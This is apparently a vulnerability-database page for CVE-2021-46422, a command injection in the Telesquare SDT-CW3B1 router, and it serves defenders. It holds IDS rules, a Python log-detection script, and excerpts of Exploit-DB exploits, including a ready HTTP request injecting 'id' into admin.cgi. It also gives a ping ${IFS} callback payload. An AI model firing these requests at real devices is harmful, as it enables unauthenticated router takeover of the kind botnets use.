CVE-2021-46422
Published 2022-04-27
CVE-2021-46422: Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
Priority: P192 · critical · 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Flags: ITW · EXPLOIT · VulnCheck KEV · Initial access · Exploited in the wild
EPSS: 94.75% (99.8th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| telesquare | sdt-cs3b1_firmware | — | — |
Detection & IOCs (extracted from sources)
command: ping${IFS}-c${IFS}1${IFS}{{interactsh-url}}
snort:
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Telesquare SDT-CW3B1 1.1.0 - OS Command Injection (CVE-2021-46422)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/cgi-bin/admin.cgi?Command=sysCommand&Cmd="; fast_pattern; startswith; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; reference:cve,2021-46422; reference:url,twitter.com/momika233/status/1528742287072980992; classtype:attempted-admin; sid:2036663; rev:2; metadata:attack_target Networking_Equipment, created_at 2022_05_23, cve CVE_2021_46422, deployment Perimeter, deployment SSLDecrypt, performance_impact Low, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_26, reviewed_at 2024_09_12, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
- The exploit requires no authentication. Any GET request to /cgi-bin/admin.cgi?Command=sysCommand&Cmd= should be treated as suspicious, especially when it comes from external or untrusted sources.
- The Snort/ET rule detects exploitation by matching the URI prefix /cgi-bin/admin.cgi?Command=sysCommand&Cmd= at the start of the HTTP URI, combined with the absence of a Referer header: flag GET requests that match this pattern and carry no Referer.
- The exploit parses the XML tag <CmdResult> from the CGI response to confirm command execution; defenders can monitor for this tag in HTTP responses from the device.
- The Shodan query 'html:"SDT-CW3B1"' can be used to identify internet-exposed vulnerable devices for asset discovery and attack surface reduction.
- The ping-based out-of-band detection payload uses ${IFS} in place of spaces as a whitespace-substitution evasion; monitor for URL-encoded or literal ${IFS} in HTTP URIs targeting this endpoint.
- The Nuclei template uses an out-of-band (interactsh DNS callback) matcher to confirm exploitation. Detection based solely on the HTTP response body may be unreliable, since the template matches an empty body word.
- The ET Snort rule (sid:2036663) is classified with 'confidence Medium'; tune accordingly to reduce false positives in environments with legitimate CGI admin access.
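The request-side signals in the bullets above (a GET to the URI prefix with no Referer header, and ${IFS} in the URI whether literal or URL-encoded) and the response-side <CmdResult> signal can all be checked over captured traffic or web-server logs. The following is an added example written for this page, not the ET rule itself and not code from Exploit-DB or any project. The sample requests and the response body are constructed; the host 192.0.2.10 and the callback name callback.example.invalid are placeholders. It separates "request hit the endpoint" from "request would also trip the ET rule", because a request that carries a Referer (as the Exploit-DB request on this page does) matches the first tier but not the rule.

```python
from urllib.parse import unquote

# URI prefix that ET/Snort rule sid:2036663 anchors on (copied from the rule above).
SUSPICIOUS_PREFIX = "/cgi-bin/admin.cgi?Command=sysCommand&Cmd="


def parse_request(raw):
    """Split a raw HTTP/1.x request head into method, request-target and headers.

    Header names are lower-cased so the Referer check is case-insensitive, which is
    what the rule's `http.header_names; to_lowercase;` transforms achieve.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def classify(raw):
    """Return the detection labels that apply to one request, in a fixed order."""
    req = parse_request(raw)
    findings = []
    # Tier 1: any GET to the vulnerable CGI endpoint is worth recording on its own.
    if req["method"] == "GET" and req["target"].startswith(SUSPICIOUS_PREFIX):
        findings.append("sysCommand-endpoint")
        # Tier 2: the ET rule additionally requires that no Referer header be present.
        if "referer" not in req["headers"]:
            findings.append("et-rule-match-no-referer")
    # Independent check: ${IFS} whitespace substitution, literal or percent-encoded.
    if "${IFS}" in unquote(req["target"]):
        findings.append("ifs-substitution")
    return findings


def has_cmd_result(body):
    """True if a response body carries the <CmdResult> element the exploit parses."""
    return "<CmdResult>" in body


# Constructed sample requests (placeholder host 192.0.2.10).
SAMPLE_REQUESTS = {
    # Admin-UI style request that carries a Referer; hits the endpoint but not the rule.
    "ui_with_referer": (
        "GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1\r\n"
        "Host: 192.0.2.10\r\n"
        "Referer: http://192.0.2.10/admin/system_command.shtml\r\n"
        "\r\n"
    ),
    # Scanner-style request: no Referer, ${IFS} percent-encoded as %24%7BIFS%7D.
    "oob_no_referer": (
        "GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd="
        "ping%24%7BIFS%7D-c%24%7BIFS%7D1%24%7BIFS%7Dcallback.example.invalid HTTP/1.1\r\n"
        "Host: 192.0.2.10\r\n"
        "User-Agent: curl/8.0\r\n"
        "\r\n"
    ),
    "benign": "GET /index.html HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n",
}

# Constructed response body; the real device's XML layout is not shown on this page.
SAMPLE_RESPONSE_BODY = (
    '<?xml version="1.0"?>\n'
    "<Response><CmdResult>uid=0(root) gid=0(root)</CmdResult></Response>\n"
)


def triage(requests_by_name):
    """Classify every captured request and keep only those with findings."""
    return {name: classify(raw) for name, raw in requests_by_name.items() if classify(raw)}


if __name__ == "__main__":
    for name, labels in triage(SAMPLE_REQUESTS).items():
        print(f"{name}: {', '.join(labels)}")
    print("response carries <CmdResult>:", has_cmd_result(SAMPLE_RESPONSE_BODY))
```

The prefix comparison is case-sensitive, as a Snort `content` match without `nocase` is, and only GET requests are considered, again mirroring the rule; both are deliberate so that the second tier reproduces what sid:2036663 would fire on, while the first tier gives a broader log-side view that also catches the Referer-carrying request.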
CVSS provenance
- NVD v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- NVD v2.0: 10.0 CRITICAL, AV:N/AC:L/Au:N/C:C/I:C/A:C
- VulnCheck: 9.8 CRITICAL
GHSA
GHSA-8557-gh6f-6c42: Telesquare SDT-CW3B1 1
ghsa_unreviewed · 2022-04-28 · CVE-2021-46422 [CRITICAL] · CWE-78
Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
VulnCheck
telesquare sdt-cs3b1_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck · 2021 · CVSS 9.8 · CVE-2021-46422 [CRITICAL]
Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
Affected: telesquare sdt-cs3b1_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
- https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities
- https://blog.netlab.360.com/new-ddos-botnet-wszeor/
- https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/
- https://for
Suricata
ET EXPLOIT Telesquare SDT-CW3B1 1.1.0 - OS Command Injection (CVE-2021-46422)
suricata · 2022-05-23 · CVSS 9.8 · CVE-2021-46422 [CRITICAL]
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Telesquare SDT-CW3B1 1.1.0 - OS Command Injection (CVE-2021-46422)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/cgi-bin/admin.cgi?Command=sysCommand&Cmd="; fast_pattern; startswith; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; reference:cve,2021-46422; reference:url,twitter.com/momika233/status/1528742287072980992; classtype:attempted-admin; sid:2036663; rev:2; metadata:attack_target Networking_Equipment, created_at 2022_05_23, cve CVE_2021_46422, deployment Perimeter, deployment SSLDecrypt, performance_impact Low, confidence Medium, signature_severity Major, tag Description_Generated_By_Pr
Exploit-DB
Telesquare SDT-CW3B1 1.1.0 - OS Command Injection
exploitdb · 2022-06-03 · CVSS 9.8 · CVE-2021-46422 [CRITICAL]
---
```python
#!/usr/bin/python3
# Exploit Title: Telesquare SDT-CW3B1 1.1.0 - OS Command Injection
# Date: 24th May 2022
# Exploit Author: Bryan Leong
# Vendor Homepage: http://telesquare.co.kr/
# CVE : CVE-2021-46422
# Authentication Required: No
import requests
import argparse
import sys
from xml.etree import ElementTree

def sysArgument():
    ap = argparse.ArgumentParser()
    ap.add_argument("--host", required=True, help="target hostname/IP")
    args = vars(ap.parse_args())
    return args['host']

def checkHost(host):
    url = "http://" + host
    print("[*] Checking host is it alive?")
    try:
        rsl = requests.get(url)
        print("[*] The host is alive.")
    except requests.exceptions.Timeout as err:
        raise SystemExit(err)

def exploit(host):
    url = "http://" + host + "/cg
```
Exploit-DB
SDT-CW3B1 1.1.0 - OS Command Injection
exploitdb · 2022-05-17 · CVSS 9.8 · CVE-2021-46422 [CRITICAL]
---
# Exploit Title: SDT-CW3B1 1.1.0 - OS command injection
# Date: 2022-05-12
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: 1.0.0
# Vendor home page : http://telesquare.co.kr/
# Authentication Required: No
# CVE : CVE-2021-46422
# Tested on: Windows
# HTTP Request
```http
GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1
Host: IP_HERE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: */*
Referer: http:// IP_HERE /admin/system_command.shtml
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
```
Nuclei
SDT-CW3B1 1.1.0 - OS Command Injection
nuclei · CVSS 9.8 · CVE-2021-46422 [CRITICAL]
Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
Template:
```yaml
id: CVE-2021-46422

info:
  name: SDT-CW3B1 1.1.0 - OS Command Injection
  author: badboycxcc,prajiteshsingh
  severity: critical
  description: |
    Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
  remediation: |
    Upgrade to a patched version of SDT-CW3B1 or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.
```
Unit42
IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
blogs_unit42 · 2023-06-22 · CVSS 9.8 · CVE-2019-12725 [CRITICAL]
## Executive Summary
Since March 2023, Unit 42 researchers have observed threat actors leveraging several IoT vulnerabilities to spread a variant of the Mirai botnet. The vulnerabilities exploited include those listed in the following table:

| CVE/Product | Description |
|---|---|
| CVE-2019-12725 | Zeroshell Remote Command Execution Vulnerability |
| CVE-2019-17621 | D-Link DIR-859 Remote Command Injection Vulnerability |
| CVE-2019-20500 | D-Link DWL-2600AP Remote Command Execution Vulnerability |
| CVE-2021-25296 | Nagios XI Remote Command Injection Vulnerability |
| CVE-2021-46422 | Telesquare SDT-CW3B1 Router Command Injection Vulnerability |
| CVE-2022-27002 | Arris TR3300 Remote Command Injection Vulnerability |
| CVE-2022-29303 | SolarView Compact Command Injection Vulnerability |
| CVE-2022-30023 | Tenda HG9 Router Command Injectio |
Unit42
IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
blogs_unit42 · 2023-06-22 · CVSS 9.8 · CVE-2019-12725 [CRITICAL]
Authors: Chao Lei, Zhibin Zhang, Yiheng An, Cecilia Hu
Published: June 22, 2023
Topics: Trend Reports, Vulnerabilities, Botnet, IoT, IoT Security, Mirai
CVEs covered: CVE-2019-12725, CVE-2019-17621, CVE-2019-20500, CVE-2021-25296, CVE-2021-46422, CVE-2022-27002, CVE-2022-29303, CVE-2022-30023, CVE-2022-30525, CVE-2022-31499, CVE-2022-36266, CVE-2022-40005, CVE-2022-45699, CVE-2023-1389, CVE-2023-25280, CVE-2023-27240
References
- http://packetstormsecurity.com/files/167201/SDT-CW3B1-1.1.0-Command-Injection.html
- http://packetstormsecurity.com/files/167387/Telesquare-SDT-CW3B1-1.1.0-Command-Injection.html
- https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?usp=sharing